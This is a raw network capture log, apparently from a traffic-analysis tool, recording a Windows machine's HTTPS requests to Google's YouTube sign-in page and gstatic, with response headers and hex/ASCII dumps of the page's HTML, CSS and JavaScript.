2024-07-26 15:57:48 UTC	1788	OUT	GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76l5PHSkuJEfmntRfpXyKF9d2CZ3ZVNDVHTO0EGAn7_bo5ZGw98nP2MHND84A-DOFk_AEPt&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1609852158%3A1722009468052145&ddm=0 HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:30FkMdE4fITVSBT8E9RkpB9l4CNviA:kopkWy9Y50s-TwhG
2024-07-26 15:57:49 UTC	4088	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: DENY x-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login x-ua-compatible: IE=edge Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:48 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Cross-Origin-Resource-Policy: same-site Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi" Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]} Content-Security-Policy: script-src 'report-sample' 'nonce-3poDy76JPgiIt54uy8XwSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/;report-uri /v3/signin/_/AccountsSi [TRUNCATED] Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O/;report-uri /v3/signin/_/AccountsSignInUi/cspreport/fine-allowlist reporting-endpoints: default="/v3/signin/_/AccountsSignInUi/web-reports?context=eJzj-sKoxSXF4KghxXBAaReTY-wTJlcgXv7-KdNqII5Z9YwpAYgPxj1nOgrEeeeeMxUB8duEF0wfgbir9QVTHxBv7nnBtB2Ip_G8ZJoFxEe2v2Q6AcQSX18yaQCx_K_prMpA7JQ-gzUIiH3qZ7DGAHHrzXOsU4E4Pu48azIQXzt-nvUWECf9O89aBMQ7RS6w7gXiWRYXWOcB8ZKIi6wZCRdZc4D4UOJF1k8FF1m_AfH9QxdZHwMx45eLrKxAbPr_IqslEDsAsQsQGypcYnUE4jl7LrEuAGIhHo4_ff1b2QQ2fPh7illJPym_MD4zJTWvJLOkMq0oP68kNS8lsbQkozSzOLWoLLUo3sjAyMTA3MhYz8AgvsAAANJOi8s" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:49 UTC	4088	IN	Data Raw: 31 63 39 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 76 33 2f 73 69 67 6e 69 6e 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 33 70 6f 44 79 37 36 4a 50 67 69 49 74 35 34 75 79 38 58 77 53 67 22 3e 77 69 6e 64 6f 77 2e 57 49 5a Data Ascii: 1c9f<!doctype html><html lang="en" dir="ltr"><head><base href="https://accounts.google.com/v3/signin/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><script data-id="_gd" nonce="3poDy76JPgiIt54uy8XwSg">window.WIZ
2024-07-26 15:57:49 UTC	3247	IN	Data Raw: 5c 5c 75 30 30 32 36 63 6f 6e 74 69 6e 75 65 5c 5c 75 30 30 33 64 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 73 69 67 6e 69 6e 3f 61 63 74 69 6f 6e 5f 68 61 6e 64 6c 65 5f 73 69 67 6e 69 6e 25 33 44 74 72 75 65 25 32 36 61 70 70 25 33 44 64 65 73 6b 74 6f 70 25 32 36 68 6c 25 33 44 65 6e 25 32 36 6e 65 78 74 25 33 44 68 74 74 70 73 25 32 35 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 25 32 35 32 46 61 63 63 6f 75 6e 74 25 32 36 66 65 61 74 75 72 65 25 33 44 72 65 64 69 72 65 63 74 5f 6c 6f 67 69 6e 5c 5c 75 30 30 32 36 68 6c 5c 5c 75 30 30 33 64 65 6e 5c 5c 75 30 30 32 36 73 65 72 76 69 63 65 5c 5c 75 30 30 33 64 79 6f 75 74 75 62 65 5c 22 5d 2c 6e 75 6c 6c 2c 5b 5b 5c 22 2f 72 65 73 74 61 Data Ascii: \\u0026continue\\u003dhttps://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login\\u0026hl\\u003den\\u0026service\\u003dyoutube\"],null,[[\"/resta
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 5f 2f 6d 73 73 2f 62 6f 71 2d 69 64 65 6e 74 69 74 79 2f 5f 2f 73 73 2f 6b 3d 62 6f 71 2d 69 64 65 6e 74 69 74 79 2e 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 2e 6c 2d 77 44 69 52 64 6b 44 37 77 2e 4c 2e 42 31 2e 4f 2f 61 6d 3d 42 42 30 4d 59 58 51 62 67 55 41 38 6e 41 4d 39 51 43 6b 51 4d 67 41 41 41 41 41 41 41 41 41 41 61 41 4d 41 41 4a 67 42 2f 64 3d 31 2f 65 64 3d 31 2f 72 73 3d 41 4f 61 45 6d 6c 47 65 32 56 30 53 33 77 35 68 37 57 70 35 59 72 39 37 54 79 78 30 4b 4f 41 58 58 51 2f 6d 3d 69 64 65 6e 74 69 66 69 65 72 76 69 65 77 2c 5f 62 2c 5f 74 70 22 20 6e 6f 6e 63 65 3d 22 45 37 30 46 71 4d 44 31 2d Data Ascii: 8000<style data-href="https://www.gstatic.com/_/mss/boq-identity/_/ss/k=boq-identity.AccountsSignInUi.l-wDiRdkD7w.L.B1.O/am=BB0MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/ed=1/rs=AOaEmlGe2V0S3w5h7Wp5Yr97Tyx0KOAXXQ/m=identifierview,_b,_tp" nonce="E70FqMD1-
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 50 78 41 65 62 20 2e 4a 51 35 74 6c 62 7b 66 6c 65 78 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 77 69 64 74 68 3a 32 38 70 78 7d 2e 6c 50 78 41 65 62 20 2e 4c 62 4f 64 75 63 2c 2e 56 55 66 48 59 64 20 2e 4c 62 4f 64 75 63 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6c 50 78 41 65 62 20 2e 4c 62 4f 64 75 63 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 48 37 36 65 50 63 20 2e 4a 51 35 74 6c 62 7b 68 65 69 67 68 74 3a 36 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 38 70 78 3b 77 69 64 74 68 3a 36 34 70 78 7d 2e 4d 6e 46 6c 75 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c Data Ascii: PxAeb .JQ5tlb{flex:none;height:28px;margin-right:12px;width:28px}.lPxAeb .LbOduc,.VUfHYd .LbOduc{display:flex;align-items:center}.lPxAeb .LbOduc{justify-content:center}.H76ePc .JQ5tlb{height:64px;margin:0 auto 8px;width:64px}.MnFlu{border-radius:50%;displ
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 6f 6e 2d 73 75 72 66 61 63 65 2c 23 31 66 31 66 31 66 29 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 47 6f 6f 67 6c 65 20 53 61 6e 73 22 2c 72 6f 62 6f 74 6f 2c 22 4e 6f 74 6f 20 53 61 6e 73 20 4d 79 61 6e 6d 61 72 20 55 49 22 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6c 50 78 41 65 62 20 2e 56 68 64 7a 53 64 7b 63 6f 6c 6f 72 3a 23 34 34 34 37 34 36 3b 63 6f 6c 6f 72 3a 76 Data Ascii: 3-sys-color-on-surface,#1f1f1f);font-family:"Google Sans",roboto,"Noto Sans Myanmar UI",arial,sans-serif;font-size:0.875rem;font-weight:500;letter-spacing:0rem;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.lPxAeb .VhdzSd{color:#444746;color:v
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 6f 77 3a 30 20 30 20 30 20 32 70 78 20 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 64 33 65 33 66 64 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 36 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 69 6e 73 65 74 3a 2d 35 70 78 7d 2e 5a 6a 79 74 69 7b 63 6f 6c 6f 72 3a 23 30 62 35 37 64 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 6d 33 2d 73 79 73 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 2c 23 30 62 35 37 64 30 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 37 35 72 65 6d 7d 2e 6d 38 77 77 47 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: ow:0 0 0 2px var(--gm3-sys-color-primary-container,#d3e3fd);border-radius:26px;content:"";position:absolute;pointer-events:none;inset:-5px}.Zjyti{color:#0b57d0;color:var(--gm3-sys-color-primary,#0b57d0);font-size:0.75rem}.m8wwGd{border-radius:16px;padding
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 70 78 3b 77 69 64 74 68 3a 32 34 70 78 7d 2e 49 78 63 55 74 65 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 6d 38 77 77 47 64 20 2e 49 78 63 55 74 65 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6d 38 77 77 47 64 2e 78 4e 4c 4b 63 62 20 2e 49 78 63 55 74 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 47 6f 6f 67 6c 65 20 53 61 6e 73 22 2c 72 6f 62 6f 74 6f 2c 22 4e 6f 74 6f 20 53 61 6e 73 20 4d 79 61 6e 6d 61 72 20 55 49 22 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 Data Ascii: px;width:24px}.IxcUte{direction:ltr;text-align:left;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.m8wwGd .IxcUte{line-height:30px}.m8wwGd.xNLKcb .IxcUte{font-family:"Google Sans",roboto,"Noto Sans Myanmar UI",arial,sans-serif;font-size:0.875r
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 3a 32 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d 74 66 73 2d 62 70 33 2c 32 2e 32 35 72 65 6d 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 36 30 70 78 29 7b 2e 76 41 56 39 62 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 32 32 32 32 32 32 32 32 32 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d 74 66 73 2d 62 70 33 2c 32 2e 32 35 72 65 6d 29 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 36 30 30 70 78 29 7b 2e 76 41 56 39 62 66 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 38 31 38 31 38 31 38 31 38 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 76 61 72 28 2d 2d 77 66 2d Data Ascii: :2.25rem;font-size:var(--wf-tfs-bp3,2.25rem)}}@media (min-width:960px){.vAV9bf{line-height:1.2222222222;font-size:2.25rem;font-size:var(--wf-tfs-bp3,2.25rem)}}@media (min-width:1600px){.vAV9bf{line-height:1.1818181818;font-size:2.75rem;font-size:var(--wf-
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2c 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2d 6f 75 74 7b 30 25 7b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 6f 70 61 63 69 74 79 2c 30 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 7b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 73 69 7a 65 3a 30 3b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 6c 65 66 74 3a 30 3b 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 74 6f 70 3a 30 3b 2d 2d 6d 64 63 2d Data Ascii: pacity:var(--mdc-ripple-fg-opacity,0)}}@keyframes mdc-ripple-fg-opacity-out{0%{animation-timing-function:linear;opacity:var(--mdc-ripple-fg-opacity,0)}to{opacity:0}}.VfPpkd-ksKsZd-XxIAqe{--mdc-ripple-fg-size:0;--mdc-ripple-left:0;--mdc-ripple-top:0;--mdc-
2024-07-26 15:57:49 UTC	1390	IN	Data Raw: 2d 6f 70 61 63 69 74 79 2d 6f 75 74 20 31 35 30 6d 73 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 74 72 61 6e 73 6c 61 74 65 2d 65 6e 64 2c 30 29 29 20 73 63 61 6c 65 28 76 61 72 28 2d 2d 6d 64 63 2d 72 69 70 70 6c 65 2d 66 67 2d 73 63 61 6c 65 2c 31 29 29 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 3a 3a 62 65 66 6f 72 65 2c 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 49 41 71 65 3a 3a 61 66 74 65 72 7b 74 6f 70 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 30 30 25 29 3b 6c 65 66 74 3a 63 61 6c 63 28 35 30 25 20 2d 20 31 30 30 25 29 3b 77 69 64 74 68 3a 32 30 30 25 3b 68 65 69 67 68 74 3a 32 30 30 25 7d 2e 56 66 50 70 6b 64 2d 6b 73 4b 73 5a 64 2d 58 78 Data Ascii: -opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end,0)) scale(var(--mdc-ripple-fg-scale,1))}.VfPpkd-ksKsZd-XxIAqe::before,.VfPpkd-ksKsZd-XxIAqe::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.VfPpkd-ksKsZd-Xx

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	61337	142.250.185.67	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:50 UTC	1063	OUT	GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.N1bNysriJnk.es5.O/am=BB2MYXQbgUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlHu1g2JNWjQ7Rsj1KTg1Ll6LPidEQ/m=_b,_tp HTTP/1.1 Host: www.gstatic.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.2045.47" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:50 UTC	934	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/boq-infra/identity-boq-js-css-signers Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers" Report-To: {"group":"boq-infra/identity-boq-js-css-signers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/boq-infra/identity-boq-js-css-signers"}]} Content-Length: 242264 Date: Fri, 26 Jul 2024 15:57:50 GMT Expires: Sat, 26 Jul 2025 15:57:50 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Wed, 24 Jul 2024 00:32:35 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:57:50 UTC	456	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f Data Ascii: "use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 4d 49 54 0a 2a 2f 0a 76 61 72 20 62 61 61 2c 64 61 61 2c 67 61 61 2c 6c 61 61 2c 6f 61 61 2c 63 62 2c 64 62 2c 67 62 2c 4a 62 2c 4c 62 2c 4d 62 2c 79 61 61 2c 7a 61 61 2c 4e 62 2c 41 61 61 2c 42 61 61 2c 43 61 61 2c 52 62 2c 57 62 2c 47 61 61 2c 49 61 61 2c 4b 61 61 2c 4f 61 61 2c 24 62 2c 61 63 2c 51 61 61 2c 52 61 61 2c 56 61 61 2c 63 62 61 2c 64 62 61 2c 68 62 61 2c 6b 62 61 2c 65 62 61 2c 6a 62 61 2c 69 62 61 2c 67 62 61 2c 66 62 61 2c 6c 62 61 2c 76 63 2c 71 62 61 2c 72 62 61 2c Data Ascii: License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Identifier: MIT*/var baa,daa,gaa,laa,oaa,cb,db,gb,Jb,Lb,Mb,yaa,zaa,Nb,Aaa,Baa,Caa,Rb,Wb,Gaa,Iaa,Kaa,Oaa,$b,ac,Qaa,Raa,Vaa,cba,dba,hba,kba,eba,jba,iba,gba,fba,lba,vc,qba,rba,
2024-07-26 15:57:50 UTC	1390	IN	Data Raw: 7b 62 3d 5f 2e 71 61 28 61 2c 62 2c 63 29 3b 72 65 74 75 72 6e 20 62 3c 30 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 63 68 61 72 41 74 28 62 29 3a 61 5b 62 5d 7d 3b 0a 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 2c 65 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 66 3d 30 3b 66 3c 64 3b 66 2b 2b 29 69 66 28 66 20 69 6e 20 65 26 26 62 2e 63 61 6c 6c 28 63 2c 65 5b 66 5d 2c 66 2c 61 29 29 72 65 74 75 72 6e 20 66 3b 72 65 74 75 72 6e 2d 31 7d 3b 5f 2e 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 28 30 2c 5f 2e 73 61 29 28 61 2c 62 29 3e 3d 30 7d 3b 5f 2e 78 61 3d Data Ascii: {b=_.qa(a,b,c);return b<0?null:typeof a==="string"?a.charAt(b):a[b]};_.qa=function(a,b,c){for(var d=a.length,e=typeof a==="string"?a.split(""):a,f=0;f<d;f++)if(f in e&&b.call(c,e[f],f,a))return f;return-1};_.ta=function(a,b){return(0,_.sa)(a,b)>=0};_.xa=
